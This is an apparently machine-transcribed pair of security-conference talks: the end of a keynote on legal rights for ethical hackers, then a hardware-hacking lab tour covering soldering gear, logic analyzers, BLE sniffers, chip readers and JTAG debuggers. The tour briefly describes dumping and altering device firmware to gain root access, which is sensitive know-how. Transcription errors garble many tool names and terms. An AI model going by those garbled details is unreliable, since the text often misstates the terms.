public opinion to push and motivate Capitol Hill to get on board and update the current legislation that will protect ethical hackers. Overall, we need all three to be supporting hacker rights for to become a reality. So how do we get there? You're probably wondering. So these are the five needs and this is the way how we can push for awareness of ethical hackers needing rights. Now, how we get there, I'm going to need your help. Overall, we need to work with the media. We need society to notice that we're everyday heroes. We need organizations to have a vulnerability disclosure program and we need representatives to update today's legislation. But how we do that, we have to change the imagery that the press is doing to. So the first step is this petition is for anyone out there that supports ethical hackers and want to bring about the change is the first step that I'm working on to bring attention to this matter. And we have over 1000 signatures and honestly, it's really it's broken down by organizations, legislators and the media and the hacker community. And anyone can sign this who agrees with it. So you can also share it around and sign it yourself. And it could be friends and family. It doesn't have to be everyone has to be a hacker who signs this. It could be anyone who believes that we deserve rights. The second step, tell the press. So anytime you see the press reporting hackers in a bad light, correct them. Write a comment below in the story, tag them in a tweet letting them know the term is actually cyber criminal and attacker, not hacker hacker or good people. So you need to do that. The other thing is calling them out when they use the dark hoodie imagery or the ski mask, which is still to my mind is the worst thing ever. We need to do fact checks and that's how you do it is unfortunately, you kind of have to publicly shame them till they get it right. And also, if you're someone who is interviewed by any journalist or anything like that, please make sure to keep enforcing them and let them know to use the term. Attacker versus hacker when reporting the breach. I've been doing that since I can do it, but it's going to take all of us and Chris Roberts has been great also doing that kind of stuff. So push out there. Let them know they got the wrong term. And the wrong imagery. So basically everyone gets a fact check. The third step is to push for organizations to partner and campaign with us. In other words, we need. Companies we need or to come out even government agencies can't do basically to come out publicly saying like we stand with the ethical hackers and. It's time to change things or to push for vulnerability disclosure programs to other companies organizations and so on. So they're also aware of that this is a need now at this point. Also, to push organizations to have a disclosure firm like I just said, it's really important that we do that because. I am so tired of having to spend hours days and weeks to find some information of who to contact. And what's in scope, what's not in scope. This is so important. Every company should have that at this point. Because they need us more than ever before. The 4 step contact your local representatives to update current legislation. So let them know that they need to change something. Set up 10 minute appointments virtually or try whatever you can to work with other groups of people that want to volunteer to go and approach representatives. And especially the ones that you need to be focusing on is your local and state, because those are the ones that we're having some serious problems with. And also last but not least, follow the van Buren US case. And there's a reason for that in the fall. The CFA is going to be revisiting Supreme Court. So please take a look at it, follow it and also contact your representatives around it. The 5th step support wonderful groups like this. So I'm a Calvary discos that I O cert coordination center cert CC. If F and CTA CTI League is really, really important that we work together and support one another and contact them to find out how they can do better or how you can help. So main takeaways overall, we need to push for awareness of ethical hackers and to let people know how we really are in our stories matter. And how we get there. These are the main takeaways and I might need your advice and assistance if you want some. But most importantly, I want to remind you that the change starts with you and me. It's never too late. And we must not give up because we must continue to fight for rights. And this is a time that we do so. I want to first say thank you guys everyone at IOT village for selecting my talk to be a keynote. I want to also thank you guys for participating. So thank you all for existing. I also want to give a big shout out to Bo Woods and Harley Gager. They helped basically put more ideas in my head for this conversation. Thank you guys so much and thank you. I have to village once again. Thank you guys for existing and please stay safe and enjoy the rest of your nap. Con weekend.
Sixty percent of hackers don’t submit vulnerabilities due to the fear of out-of-date legislation, press coverage, and companies misdirected policies. This fear is based on socially constructed beliefs. This talk dives into the brain's response to fear while focusing on increasing public awareness in order to bring legislation that supports ethical hackers, ending black hoodie and ski mask imagery, and encourage organizations to support bilateral trust within their policies.
10.5446/50722 (DOI)
in the lab, and we're going to be covering everything from kind of the basic level to the advanced level. When this thing's all with, I'm going to be jumping on IoT Village Discord, where you'll be able to ask me more questions. I also, everything we're going to talk about is show today. I actually have a price list. It's kind of an Amazon type price list showing a lot of, well, not just Amazon, but various places that you can buy this stuff. That'll give you an idea. Of course, if you shop around, you'll be able to get some of this stuff cheaper. So let's go ahead and talk about what our agenda is today. So we've broken this up into a number of categories. Disassembly and assembly of hardware tools for taking things apart. Soldering, desoldering, equipment, a magnification, which may come in handy if you have that perfect eyesight, more power to you. But for some of us that may not have great eyesight or getting a little older, magnification plays a big role into how we can actually see things and do soldering at surface mount level type technology. We're going to be looking at monitoring devices and technology, debugging tools. And then I'm going to cover probably one of the most important ones. It's the odds and ends, the pieces in the parts that make your life way much easier in a lab. And awfully, the pieces and parts build within your lab as you kind of work through the various aspects of testing things. You go, hey, if I bought this little item here, this header, this plug, this switch, it would make my life easier. So you start building up a good ensemble of those types of techs. We're going to be talking about those at the end also, which I think is very important. But let's go ahead and jump out over to a screen and let's go ahead and get a camera going in here and see how this works. Oh, that's kind of interesting. I control. There we go. That's much better. So let me get out of the way of the camera so you all can see me. So, again, this is kind of my lab and we wanted to start off with looking at tools to take things apart to start with a screwdriver set. These things are critical. And I would recommend I had a previous screwdriver set. I can get it apart that did not have a box for it. And one of the things I found out is they're literally laying all over the place because I never had one good place to put them. Or they ended up in a bag somewhere in all this joint. So get something you can pop them in and out and it holds them real well. This has straight slots, Phillips. The other thing you want to consider is star tips. There's a number of small devices when you go to take them apart will have the star pattern tips. So you want to take that into consideration as a big component when you're doing this. And then you can get you can get some other small tool kits. This is one I had sitting in my thing over here. And I didn't even know I had it. So it's a good breakout with some basic sockets. Needle nose, some of these different heads, stars, Phillips straight slots, a little bigger size than the small ones that may come in handy. And then also when you start thinking about it kind of wrenches and different things like this, a set of cutters is always good. So you want to have a good assortment of these. And every once in a while I have a tendency to lose these things so I end up buying more sets of them over time. Also, something to consider is a pair of good cutters. Now, I've had wire cutters before small ones like this, but I like these because the tips are way much thicker. These things are actually great and they come in handy for not only cutting wire, but here's an example of a bracelet type thing, a tracker that was hermetically sealed. This came in really handy for cutting through some of the plastic. It's very durable. I've used this for removing shielding that are over components where I need to get access to shielding. So having something can cut through metal and plastic and durable and the tip on this doesn't ship up. So having something like that is pretty critical. The other thing you want to consider is spudges. So what's a spudge? So this one I've managed to lose half the stuff that's in it, but this one has little fiberglass spudges. These are pry tools that you can use for prying things open. These are all fiberglass. Several of them are kind of mangled because they've been beat up pretty heavy. I also have some small metal thin spudges in here and some ones that look like kind of the tip of guitar picks. Those come in handy for popping them in plastic cases and I also bought a kit and this one's been really handy. That is basically metal ones. So you have to be careful with these because they get like seriously hurt you if you're not careful or do some damage to the equipment. But these come in really handy for opening certain cases, removing certain plugs or connectors or things like that. So having a good set of spudges is pretty good. Most of these are fairly inexpensive, $8, $9, $10. You can often get a set of these. I've seen some much bigger, nicer sets that run in the $20, $30 range. But always a good have a set of these. It'll make it very important when you're actually opening stuff up. Now the ultimate tool, what happens when you end up with a case where you can't easily clip it open, you can't easily spudge it open. There's no screws in it. It is like a stick. I've had cases that were actually eighth inch to three eighth inch thick casing that were waterproof. What do you do? So in those cases, what I'd like to do is a good old fashioned Dremel tool. Now you can get these in various prices. This one's probably the last one I got, which is recently new. My last one was cheaper. I think I paid like $35 for like a decade ago. I finally burnt it up and had to go out and buy another one. And since I obviously make more money now, I would have had and bought a better Dremel tool. So if you were actually at the RSA event when we were working in the IoT Village, we had a lot of light bulb type tech that we were playing with. And this is what I used to cut those good old fashioned light bulbs apart that contained the IoT based technology in those. So that's kind of the general hardware type stuff. The next thing we want to get to, and this is the price list, that we want to get to before we jump into some of the other stuff. Before we jump into some other area or start asking questions, I want to talk about some of the soldering type tools or equipment. So there's a number of solutions you can do from a soldering perspective. You can buy soldering irons in all kinds of different prices. Years ago, I used to have like three or four soldering irons. So they were all fixed heat levels or fixed wattage. I think I had one, it was 25. I had one, it was 45. I had one, it was like 75. And I think I had one with clear up to 100. Those worked for me back then. But as you know, technology advanced, you start getting in surface mount devices, it becomes inherently more difficult to use those. They're a little more cumbersome. So I always recommend actually picking one up that is kind of variable heat. So you can change the heat on it. And if I don't smash everything in this lab in the process. This is one you often will see a lot of people have and I've used this as a HACO. And I've used this one for several years, like two or three years. It's variable heat. It worked for most point. And you can get a lot of tips for it. But as I got more, more advanced and more into more detailed type work, my biggest problem with this was heat recovery. So when I went with really fine tips and I was sorting on something that was a ground. The problem I had was this device could not keep the heat level up and would make things harder. And so when you can't keep the heat, the heat recovery is terrible or not really good on a device. It caused you to spend more time on the device, more time on the chip, more time on the leg. And it leads to damage of the components. You can easily end up pulling leads and stuff like that. And keep the actual time on device down. I actually cranked the heat of this thing all the way up high as it would go. And that made it possible for me to work really quick. That kind of works for me. Other people will do other things when they're dealing with this. But then I finally decided I wanted to move on. And I think these are right around 100 bucks. Great product in my opinion for entry level starter. And it works pretty good. Now there are other vendors that produce soldering equipment. And one of the ones I went with, see if you can move some stuff out of the way here, I went with a Weller. So the Weller unit, hopefully you can see it is setting back here. I think this is a WX01 or WX02. It actually has two soldering irons on it. When I purchased it, it came with a single soldering iron. This does, I think, want to say 65, 75 watts somewhere around there. It's pretty good. Works great. This thing is capable of pushing out 150 watts of power. So you can run two irons. I turned around and actually purchased a microiron. So you can see this tip is really fine. I probably can't even see it on the tip of my finger. It's pretty small. This is actually brilliant. Works really good. The difference is this is a very expensive unit. I think the retail on this was like $1,200. You can get it on sale and shop around. You can probably get it down around 800 or less. So that's kind of where we want to think about soldering gear. You want to be able to have some good soldering gear that'll actually do what you want to do. You want to be able to deal with surface mount devices, small components, large components, neat, good heat recovery. A good starting unit is the HECO. You can also get smaller range wellers. That'll work pretty good. So I would shop around and ask other people that have different equipment, what they use. You'll find out a lot of people use the HECO. But you'll find a lot of people are fans of weller or some of the other products. So I definitely encourage you when you get ready to go out there, if that works for you, HECO works for you, get it, use it. I used it for like two and a half years and I loved it. Had no problems other than the heat recovery issue. So where do we go from there? So the next area I want to talk about, now let's go ahead and start off with asking some questions. So Jonathan, are there any questions out there? Yes. So it looks like right off the bat here. We've been talking a lot about like sharp tools and hot ends on the solder iron, things like that. One question that came up was what kind of safety equipment do you keep on hand with your lab? And do they include things such as maybe like goggles, first aid kit, fire extinguisher? So I don't have a first aid kit. Well, I do have a first aid kit. It's my wife. She knows how to use 911. Hopefully she won't have to do that. But for safety equipment, there's some other things to think about. Obviously, when you're soldering, you don't want to have breathe all of the nasty smoke. That's a health and safety issue. So I would recommend a fan. So here's actually a fan that you can purchase that happens to be on a articulated arm. So this works pretty good. The other thing I have in my actual lab, it's not within the picture range. But let me see if I can pull it off here is a is a good old fashioned fire extinguisher. So and I also have safety goggles and safety gear associated with that. So I would definitely recommend that if you set up a lab where you're going to be using hot equipment, inshore equipment or whatever the case may be, you want to be able to put out any fires that may actually show up. Luckily, I've never had to actually use this fire extinguisher. And speaking on that same thing, it becomes in handy when you start thinking about soldering to gear, this particular sorting gear here, if you go away from it after a period of time, it shuts off, which is nice. The HECO does not. So are there any other questions or you want to move on from here? Let me see here, taking a look at the list. I think we're okay to move on. Okay, good. So let's go ahead and jump into the next thing. And that is kind of magnification. So what kind of gear is available for actually magnifying or looking at things? I have a number of things that I use. One of them happens to be these goggles. So they have adjustable eyepieces on them. You can turn a light on. This is good for close up looking. So you have to hold the item up close. So you can't really do any soldering with that, but that comes in handy for quick examination of devices. One of the other things I have in here, I haven't used it in a while, but I used to use it quite a bit. And that is a pin camera. This is a USB pin camera that I can shine into things. It goes into smaller places, works pretty good. I also have a, actually a borescope, an endoscope that can actually be put through small holes and you can actually see stuff. That one's kind of packed away right now. The other equipment that I have is, and you may have seen this, if you've been to the IOT village where Rapid 7 is working. This is a device that comes in pretty handy. Small bench camera with a screen. You can actually magnify it, has variable settings on it. You can focus it. You can also hook a USB up to it and feed it into a TV. In this particular case, I went ahead and actually covered this with rubber. The purpose of the rubber in this case is to protect it. So I can actually put energized equipment on here and look at it also. So some of the other equipment I have is, this is another USB microscope and there's so many on the market. You know, which one's better than another one? Gosh, you know, that was kind of a hard one. You can spend anywhere from 20 or 30 bucks up to $300 or $400 for one of these. I've seen these that would go clear to $5,000 X, which was absolutely amazing. You could actually see the runs on a silicon chip with it. So it was kind of amazing. But that's, again, a very high end. So, but when we get into something bigger, something you want to solder under, this is the more expensive solution right here, which is a microscope. This is great microscope that I have this one does everything from 3x I believe all the way up to 90x has ability mounted camera on it. It's variable focal length. And you can actually slide it in and out, which makes it really handy for this type of work for magnification and and I do a lot of surface mount device work underneath this. I've used this for reball and BGA's and stuff like that. But this is an expensive unit and they vary in price based on whether you go up to the higher caliber. This, like I said, this is 90x. It's about a $600 unit. But if we kind of kind of move away from that and go, what can somebody who's entry level or right above entry level looking for a good scope, here's one I use for a number of years. And I loved it. So this here is also an amp scope. This one will do 10 to 20 X power. It is a fixed focal length. This device cost about $185. It is a brilliant piece of equipment. I have several these that I use in various training that I've done in the past. And I would recommend if you're looking for a scope and you don't have the big money, look at something like that. Look at amp scopes and look at what they have to offer from a price point. And I think this model here was 185 and it worked like a champ. Again, I use it for a number of years. But then I kind of got greedy and wanted something that's like super ass cool. So I would have had and bought this for work in my lab. So what else can we dig into here? I think some of the most important thing we want to talk about in the area of soldering is to look at some of the other components that you may need for action soldering. And when you get into soldering, it's kind of critical. You want to be able to, you want to have typical solder. So go ahead and switch out the screen so we can actually dig into some of this stuff a little closer, then we'll pop back to the other screen. Because we can actually show this stuff a little better here. So here from the solder standpoint, there's a number of different brands out there. This particular brand is six one half dozen another. But I would get the small stuff this one here happens to be the point three millimeters. I use lead solder. I hate lead free solder. Some people may like it. I think it's horrible to work with. So I think this works much better in every case that I've ever worked with. And you also want to get solder wick solder wick comes in really handy for removing and cleaning solder off the board. But when you're thinking about actually removing solder, and you want to dig in and remove surface mount devices, the ultimate solution for moving surface mount devices in my opinion, easily is this product right here. If you have not used this chip quick surface mount the Maurice removal kit, you're missing out. This will make life much easier. It comes with a flux. So you put the flux on it and then it comes this looks like solder. This is not solder. It's way more brittle. It's a low temperature metal. And what it'll do is it'll absorb the solder and it'll keep the temperature down low. So let's say you're actually trying to move a T sop 48 which is a 48 pin typical memory chip that is soldered down with 48 pens. It's kind of hard to keep 48 pins melted. But with this stuff, once you put it on there, you can easily spread it across each one of the leads, gump it on there pretty good, and it'll stay melted and you can lift the chip completely off the device. It's a true life saver. So let's kind of move on. Any questions? Do we have any questions from the audience? Jonathan, any questions from the audience? Looks like the question list is empty here. One quick thing that did come up. You mentioned earlier, you're going to provide a parts list but one high level question. Most of the parts that you've just mentioned now, such as like the chip quick and solder, you generally purchased that going through maybe like spark fun or maybe through Amazon. Again, knowing that you're going to provide the parts list just a high level question. Yeah, typically when I buy this stuff, I'm, I'll be honest with you, everyone, I'm kind of lazy. I'm an Amazon kind of guy. I can usually turn stuff around and a lot of times Amazon has stuff available quicker. So if Amazon has it available within 24 hours to 48 hours, I'm going to pay that little extra and have that sent to me quickly. But yet, you know, you can go off and buy this stuff from a number of vendors, a number of organizations that sell these type of products, hacker groups, hacker organizations, technology organizations, Ali Express, for a lot of the stuff you're going to see today, you can easily just order it and have it straight ships from China. But again, I have a tendency to be a little lazy and when I want it, I like want it now. I don't want to wait a week for it. Because if I think I need it, I need it now. And that's usually how I go with Amazon. So you'll see a lot of the links on here going off to Amazon or Weller or some of the other places for equipment manufacturers and buying it that way. Okay, so let's kind of, it's kind of move on here. So the next area we want to look at is monitoring equipment. So thinking about monitoring equipment, you know, how do we how do we gain access to circuit boards? And how do we start looking at data? One of the first things is kind of that USB to serial component. And, and I think a lot of people online are probably familiar with these. These are reasonably inexpensive. It's a bus pirate. And this will give you give you that level of access to be able to look at start looking at devices. And the other things, I'm not a big fan of this. I have a tendency to like using this in a different way. There's other software you can actually install on these and actually turn these into debuggers for at mail chips. So if you need to debug or a read date off an at mail chip, you can easily take these and put I think it's SDK 500 v2 software on it. And I showed this last year at at the it village was hands on exercises that actually did that we're using reprogrammed bus pirates. So that's pretty good. The other thing, and I'm a fan of these I have a whole box of these sitting around here. And here's the little chikra. The chikra has a lot of capabilities. And here's kind of the little data sheet. It comes with it. So we have we have the you are we have J tag and you can use open OCD that and you can use SPI for actually reading, reading memory off chips. And this device comes in really handy. I typically use this for you are. And, like I said, I actually love this device quite a bit. And then there's other other things you can do. There's other FTDI devices that can be used. Here's just a couple I have in my lab that I purchased for other purposes and reasons. And then there's another one I have. And this one I bought not too long ago, I guess it's probably about three or four months ago. And this one actually has for you are built into it. So it is a USB, it has four yards and you can switch in between three volts and five volts. So you can either hook them up here or hook them up into the actual projects. This is nice you plug it in and for you are functions show up. This makes it much more easier for hooking into multiple connection points on an actual device for doing you are testing our analysis. People have seen the work that I did on the internship communication. I like to use one of these works out pretty good for capturing multiple you are it's for analysis is data as it flows through a system. And also, let's go ahead and move on to logic analyzers. So I want to point out that Jonathan is actually going to be speaking tomorrow evening. Is it tomorrow evening or tomorrow morning, Jonathan. Yep, tomorrow evening. And he's doing, he's going to do a talk on using logic or logic analyzers. So, there's a lot of different logic and you know, by I think Jonathan has has one of these he's actually going to show you as another one. These are cheap this is like 12 bucks. It does like 242425 megahertz. Another one that I have. This one is a sale. This is their four, four channel one. It's no longer being manufactured. But say they had a whole stinking warehouse full of them. And they're selling these these are more pricey they're 100 bucks but it's a sale high quality. Now what I use is I do have a sale. I have the eight channel, the eight channel. I think this is like $600. This is the, I think it's 100 megahertz eight channel. This one's the actual pro works great for everything I'm doing in the lab and if you're not doing it for a job and you're just a hacker or whatever in your education and your learning, you can actually get an edu kind of version of this which will save you a significant amount of money when it comes to logic analyzers. So, also, some of the things you may you may want to consider earlier you may have seen theoscope and that was in the back of my room. I have an old scope. I use it sometimes for basically signal chasing. But other than that I don't use it that much for most of the tech that I have. But when it when you want one it's nice to have one and they come into a number of price ranges. So, you know, you can get one from, you know, typical ones you can run off your desktop or laptop with a small plug in board, all the way to high end digital built in logic analysis type of stuff in the thousands of dollars. And one I have was a textronics I'm a big fan of textronics since I came from the military. And I think mine was like five or $600 and I believe it was a 15 megahertz box and it works pretty good. So, moving from there. Another area as a hacker that you want to get into is often the RF stuff. You want to start digging into RF. So, one of the big RF areas is often Bluetooth low energy. So, these are the go to Bluetooth dongles. These are CSR 85 10s. These are the ones that will work with pretty much any, any of the Bluetooth developed software out there they have the right chip sets in them. And these only go up to I believe 4.2 version. I don't think they'll support five. I don't think I have anything here actually it supports five right now it's something I need to add to my lab myself. So that's one of them. Another thing is the Nordic. The Nordic makes a dongle that you can use with nrf connect their desktop product. And this happens to be it I think I paid $25 or $35 for this. So, I would recommend having one of these for Bluetooth this has a lot of cool capabilities. And there's a number of development boards and testing boards that are available out there that give you the ability to take what you're doing with Bluetooth to almost any level you want. Another device I have that actually like it's pretty good this is a who long this is about a $100 I think it was this device. I've had it for a couple years. So hopefully they'll come out with a newer version of sports five. But this gives you the ability to and it has to be run on a Windows box gives you the ability to capture Bluetooth. So it'll actually see the the announcements coming out on Bluetooth, and it will actually let you pick one of the devices out of the list of Bluetooth low energy devices. And as soon as it and once you pick it out it will start to output all that stuff to wire shark directly. And then once it'll actually capture the pairing process, and the entire authenticated process. Basically, I don't want to say man in the middle but capturing all of the data and outputting it correctly to wire shark for analysis. I don't want to be one of the best ones out there in our F. There was a used to be an RF sniffer, I think was sniffer that was available. That would run on a desktop. This thing's like way better. This actually has all three BLE channels so it picks up all the data doesn't miss that much data so it makes it a lot much better. I would recommend that. And of course, if you get into some other stuff, having the uber tooth one is probably good. I haven't used this in a while. I heard people complaining that it's really updates on the software follow up work on the software arena hasn't been done, which is kind of sad because I think was a very brilliant, capable tool but hopefully they'll continue supporting that and we'll see some new capabilities in the future. So that's a reference to that. Moving from that, typically, I don't have a ton of things. I think here we have a yardstick, which is under under the gigahertz range, capturing. And then, of course, and I know I have land around here somewhere, which I have no idea where it's laying at. I'm like terrible my lab. I have a hacker RF that may come in handy for some people that really want to do the work dealing with RF communication. So I'd recommend buying what you can afford, you know, finding an area that fascinates you on the hardware hacking area. And to spend as much in that area that you can afford for the best tools. I would recommend shopping around. Some of these tools here may have newer versions. There may be better released products out there. This is constantly a changing field. What I bought a few years ago doesn't necessarily meet the needs now in a lot of cases. I can find myself as I'm doing new projects and new testing that I have to go out and actually buy new equipment and new hardware. It seems to be an unending process. It's kind of like being married in a homeowner. You're always looking for an excuse to buy new tools for around the house. It's the same way as a hardware hacker. You're never going to be content until you have all the all the tools ever made on the face of the earth. But shop wisely and I think you could do pretty good gathering up the needed stuff being able to do the work. So there's one other area before we take a quick break and actually look at or has some questions. Another tool. Let's not forget critical tools. I don't think I'm using a multimeter. Literally I don't think there's ever on any engagement or any testing or any device I tore apart where I was hacking on where I didn't use a multimeter. These are cheap. You don't need an expensive one. Mostly I use this on the continuity field for actually tracing out runs on boards and stuff like that comes in very handy. So I'm just going to go ahead and cover checking voltages prior to hooking stuff up to make sure that I'm matching the voltages correctly because that can really screw things up if you get it wrong. Also moving from there. Let's go ahead and quickly cover the area dealing with debuggers. Matter of fact, let's kind of stop right there. And before we get into chip readers and debuggers and see if there are any questions. Open. Oh good. Yeah, it looks like a couple of couple popped up here. So yeah, I guess the first question we have here is, this is with regards to the physical non RF signal quality that we're speaking of earlier. So you'd mentioned the oscilloscope. And also, I know that you've mentioned that you aren't really going to in depth with it these days because you don't really need it. So I'm curious, or excuse me, the questions asking, I am curious, would your answer to that be the salee does okay for that sort of thing. And would you recommend a salee over an oscilloscope. The answer that is yes. I think my go to is with salee logic analyzer 100% now for almost everything I'm doing almost everything I'm looking at is digital salees come out with the. I'm not sure what was the name of it. I'm losing my mind here. Just second. Oh yeah, their logic logic tool, which is what interacts with the salee. They came out with logic to and the cool thing with logic to it basically, it basically gives so much more features to the actual salee. And one of the features is kind of continued streaming instead of capturing just capturing data, like you often often will do. This will actually let you loop that capture so it continues to run. I've seen myself taking a logic analyzer and using it like a probe, looking for ongoing signals timing signals and stuff like that clock signals that are ongoing burst traffic, because I can easily stop on something and as this thing continues to run see burst traffic. And finally, it gives me a way to do some digital signal tracing maybe it's not the, the most effective way but I think it's the most cost effective way. So definitely would recommend if you're going to spend the money by yourself a good logic analyzer that besides the multi meter or is the item that I inevitably use on every engagement and every testing that I do. So any questions or is that it. That's it. All right, so let's go ahead and let's jump into chip readers. So, hey, you happen to have a device and has a flash memory chip, and you want to be able to get the date off that flash memory chip. So let's do it with. So there's a lot of inexpensive solutions out there. This one here is an actual TL 866 plus. This comes with a slew of sockets that go in for this is like a T sub socket and they get eight pin or 16 pin sockets and then eight pin sockets list goes on and on there's like 30 20 or 30 sockets you actually get with the socket that I purchased. That is actually a, oh gosh, there you go. It's a WSAN WSAN eight sockets. So you drop it in. These are a little more pricey, but the the TL 866 is not that expensive. I think I paid 130 bucks for the one that I have here. Although when you buy this, and it comes with this particular this particular socket this T sop 48 socket. This will not work for all T sop 48 which is typically Nan flash chips. So you need to go out and buy this one to go with it. And you can get these off Ali express or maybe some other sources. And this is the get it right there and oh eight socket. And typically, typically this is the socket that's used on the chips that have literally a larger memory start getting in it. You know, 128 Meg 256 Meg chips and higher. You're actually going to go over to this socket here. That seems to be the case. So that's one of them that I have. Like I said, I have several chip readers. I can't remember the number of this covers. I think it's like seven or 8000 different chips that are actually supported by this. So does it cover every chip that I encounter the answer to that is no. Does it cover a large number of them. Yes, it does. I mean, it probably covers two thirds of them that I come across. One of the other chip readers I have is these are T 809 H. So the RTA 09 H here it is here similar little bigger physical construction. This one comes in handy. You cannot use you can use these sockets so all of the inline sockets that came out of the TL 866 that are straight pinned the pin wiring and don't contain any kind of circuitry. You can use them on this. But if it happens to be the T sop 48 those actually had circuitry built into them. So you have to buy a socket that'll actually work on it. And this is a straight pen for pin one. So I use this one typically as a backup. There's times that the TL 8 TL 866 doesn't work or doesn't have what I'm looking for. So I jump over to this one. It works pretty darn good. Also this one you can get various sockets for here happens to be a socket for it. This was like a $40 socket. This is a BGA. This is a 63 ball BGA. Nan flash memory socket. I think I played 45 and had that shipped over from Ali Express from China. The crazy thing is I ordered it right when this whole covert thing hit this fan. So, so it took like two months to get to me versus the typical 30 days that I often have up wait or shorter time period. So that's one of the readers. So some of the other readers I have in my arsenal here is dealing with embedded multi chip packages and embedded multi, embedded multi, multi meeting controllers. So these you actually find a lot when you deal with in bed at systems and especially some consumer grade IOT. These are actually for reading BJs. This is an embedded. It's a multi media chip for 153 ball BGA. So you open it up. You drop the chip in there. Plug it in. It's USB three plug it into your computer. Hit this button here and that chip will mount up just like a file system. It'll mount up just like an SD card will mount up and it'll actually mount the entire file systems on the device most of the time. And from there you can quickly recover the data. Sometimes you can alter the data. One of the exercises I did I actually use that to pull the data and then use one of these in all data and then did it back to the actual chip and then reball the BGA put it back on the device to gain root level access. So these are great and they come in a number of different sizes. So that's known as a embedded multi chip package type thing. Again, you'll find these in a lot of devices. That means it contains both RAM and flash memory in the actual chip. But these ones are kind of pricey like $135. There is a cheaper version. This is pretty much the same thing but it's done up just like an SD card. So, and then you just plug it in like an SD card into your computer and it'll mount the chip up just like a file system. Now these ones are a little cheaper. I think they're well under $100 like 90 bucks or something like that. Also, if you need to deal with embedded multi chip package are embedded. So, I would recommend multi media chips. I would recommend doing a little googling on that because this example here people have actually built these. So there's ways to build these. Of course, you may have to dead bug the chip, which means you're going to need a good, a good microscope because you end up soldering to the pads of the chip on the underside. There's only like five connections or four connections that have to be made on the chip and you can literally actually read it. So there's a lot of documentation out there. So you can take the hacker mode and save yourself a lot of money. But again, it'll take a lot more time. So, any questions there on chip readers. And again, most of these chip readers were $120 to $140 right around there. One question that came up with regard to the chip readers here that I'm seeing is I miss a little bit of a backfill I do apologize. One question that came up earlier is it is it actually worth picking up an old bench top logic analyzer off eBay, or going with with some of the newer USB tools. Cost is a limiting factor for this individual. You know, I don't know enough about any of the bench top logic analyzer tech that you're talking about. I haven't worked with any of those. I typically most of the stuff I did with is the USB stuff. I mean, if you're looking for logic analyzer just to give it a try. I'll be honest with you, a lot of these when you start getting into these smaller ones 24 mega earth. I have not used this. So obviously it's $12 from a logic analyzer standpoint. This gives you an entry point just to get familiar. And I think the logic programs put out by say, they will actually work on these. And there's a couple other ones and Jonathan's going to talk about this in more detail tomorrow. So I definitely swing by his presentation. I would start off if money's limited. I mean, can you come up with $12 give one of these things to try. I bet you nine times out of 10 on most standard consumer grade IOT. This is going to be fine. I've only run into issues when I'm dealing with commercial level devices where a megahertz rating like this would not have worked. So, just an example. That makes sense. And another backfill question here. Asher says such a great lab Darryl one question. What do you use for on chip debugging other than the sheet drive. Oh, on chip debugging. Yeah, we're actually get into that next. If you want to do on chip debugging, or pulling firmware, all the chips and all that type of stuff. That's the next section that we're going to dive into. Okay, perfect. And I think we'll put a pin on that question because it sounds like it'll be answered next question here reads. What are these readers used for? What are you reading off these chips? Sorry, noob. Thank you. Oh, there's nothing wrong with that man. I mean, we were all learning at one time. Five years ago, I couldn't have told you any of this stuff at all. So, so, so what we're doing is, is these chips I'm talking about are flash memory chips. This is where the embedded devices holds its operating system. It's also where it holds configuration settings and data associated with the functionality that device. So if you want to be able to pull off the firmware for some kind of offline analysis, you want to do some offline debugging with with Ida Pro or something like that, then you need to be able to extract the firmware. So to be able to extract the firmware, you need to gain some level of access. Chip readers come in handy for doing what I consider off board reading. So you de-solder the chip, remove it from the board, drop it into the reader, dump all of the memory out of that chip, and then you solder the chip back on the board. I have a tendency, since I'm fairly good at soldering and de-soldering and stuff like that, that I will often do that. I will literally just pull the chip versus trying to do it in circuit because I found it's sometimes much easier. In some cases, not always, but in a number of cases. The only time it's more difficult is when you're dealing with like a ball grid or a chip, a PGA chip, where the pins are underneath. So when you remove it, the complexity of putting it back on is fairly complex. So hopefully that answers that question. Make sense. And one final question here. Yeah. Zero. It's asking about the flipper zero. Individuals asking, what are your thoughts on the upcoming flipper zero? Is it a great asset or a gimmick Kickstarter problems apply? Flipper zero. I don't think I've seen that. Have you seen that? Have you looked at it? Yeah, it looks super interesting, actually. I'm additionally not familiar with it. Looks super slick. Looks like you can do a lot of hardware analysis with it. I think it looks kind of cool. It's very powerful for sub one gigahertz. From what I'm seeing there, it looks somewhat similar to the yardstick with maybe a few additional features, but it looks pretty slick in my opinion. Yeah, like I mentioned, there is always new tech being developed. So often I don't dig into those unless it happens to be on my table or something I need to work on. And then I go out looking and I try to look for the right tool, the right solution, the one that's going to help me do the job the easiest and the quickest. So hey, great. Thanks for bringing that up. I'll have to look at that once we get offline here. Yeah, and Darryl, we actually had the inventor of the flipper zero present our event back in May. So anyone who's listening, you know, we should check that video out as he goes through all the features and so the story of why he built it. Outstanding Sam. Thank you very much. We'll check that out. So kind of moving on from there. So I want to get into some debugging. There was some area I did miss earlier, and we may jump on it at the end if we have time, but we'll start with debuggers. The first thing I want to look at is not necessarily a debugger but pretty darn close to it. This is fairly pricey about 150 to $170 to j tagulator. I have not used this in a while. So if you don't ask me why I guess I had need to figure out where the J tag connections are in a while. But if you're in a bind and you need to figure out if there's any exposed J tag connectors on a chip that you can identify. This is the tool for doing it. You just plug all these in here you hit reset go. You have some software you can run on this thing. You can use the ability to go through all the same. All of the testing sequences for all the different wiring combinations that you could possibly generate by plugging this thing in and checks for various J tag connections. I don't use it for you are typically that's easy enough to spot with a logic analyzer fairly quickly, but yet a good tool to have in your arsenal. If you're doing a lot of especially if you're doing a lot of debugging devices where you can't identify whether a J tags available. They also added some features to this that will actually go through and do I O testing. So it'll do a series of test information feed and restruct and capture based on identifying the various I O is on a processor. So that's also a great feature. So when it gets into logic or not logic analyzers but debuggers, how can I interact with the chip? How can I interact with the processor? And there's and some of them may be hey how can I pull firmware out of a processor that actually has flash in the processor, which seems to be the thing I often do. I have a whole slew of debuggers I got dozens and probably a dozen of them laying around here somewhere for various things. But there's one that I have that's like go to at least mainly for arm processors. And that's a J link J link Seeger J link is a great product. This is a commercial version. These are kind of pricey based on the speed and the capabilities of the hardware. So the price goes up and up. I think this one was like $600 can easily go upwards of 1000 or more for the solution. But there is hope. If you're interested in the Seeger J link and you are basically a student or somebody learning, you can buy the edu version. When I first started learning and wasn't using it for commercial use, I purchased that it was like $70 has all the similar capabilities. It's its speed of data reads probably not as fast, but it's pretty good. Another thing I do is a habit of mine is I always tape the pin out for all of the pins on some of these devices, because I rarely throw a 20 pin plug in there and use it. I often use single plugs because often we use this for not only for standard J tag, but I use it for sir wire sir wire debug or CJ tag. This will do CJ offset also, 